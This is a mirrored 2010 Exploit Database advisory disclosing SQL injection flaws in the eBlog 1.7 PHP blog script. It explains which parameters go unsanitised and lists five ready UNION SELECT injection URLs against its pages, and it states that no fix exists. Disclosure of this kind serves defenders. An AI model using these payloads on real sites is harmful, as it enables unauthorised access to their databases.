eBlog 1.7 – Multiple SQL Injections

• Exploit Database
• 10 阅读

• 作者： Salvatore Fresta
  日期： 2010-11-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/15486/

• eBlog 1.7 Multiple SQL Injection Vulnerabilities
  
   NameeBlog
   Vendorhttps://emuci.com
   Versions Affected 1.7
  
   AuthorSalvatore Fresta aka Drosophila
   Website http://www.salvatorefresta.net
   Contact salvatorefresta [at] gmail [dot] com
   Date2010-11-10
  
  X. INDEX
  
   I.ABOUT THE APPLICATION
   II. DESCRIPTION
   III.ANALYSIS
   IV. SAMPLE CODE
   V.FIX
   
  
  I. ABOUT THE APPLICATION
  ________________________
  
  eBlogisafreescript that can be used to manage and
  maintain personal blogs.
  
  
  II. DESCRIPTION
  _______________
  
  Some parameters are not sanitised before beingusedin
  SQL queries.
  
  
  III. ANALYSIS
  _____________
  
  Summary:
  
   A) Multiple SQL Injection
   
  
  A) Multiple SQL Injection
  _________________________
  
  Input passed to "id", "keywords" andtosome parameters
  sentviaPOSTmethod, is not properly sanitised before
  beingusedin SQL queries. Thiscanbeexploitedto
  manipulateSQLqueries by injecting arbitrary SQL code.
  
  Successfulexploitation,onlyin somecases, requires
  that magic_quotes_gpc is set to Off.
  
  
  IV. SAMPLE CODE
  _______________
  
  A) Multiple SQL Injection
  
  The following sample code don't need requirements.
  
  http://site/path/topics.php?action=ShowComment&id=-1 UNION SELECT 1,2,3,4,5,6,7%23
  
  The following sample codes requirethat magic_quotes_gpc
  is set to Off:
  
  http://site/path/pages.php?id=-1' UNION SELECT 1,2,3,4,1,6,7,1%23
  http://site/path/topics.php?action=show&id=-1' UNION SELECT 1,2,3,4,5,6,7,8%23
  http://site/path/sections.php?action=show&id=-1' UNION SELECT 1,2,3,4,5%23
  http://site/path/search.php?keyword=%25' UNION SELECT 1,2,3,4,5,6,7,8%23
  
  
  V. FIX
  ______
  
  No fix.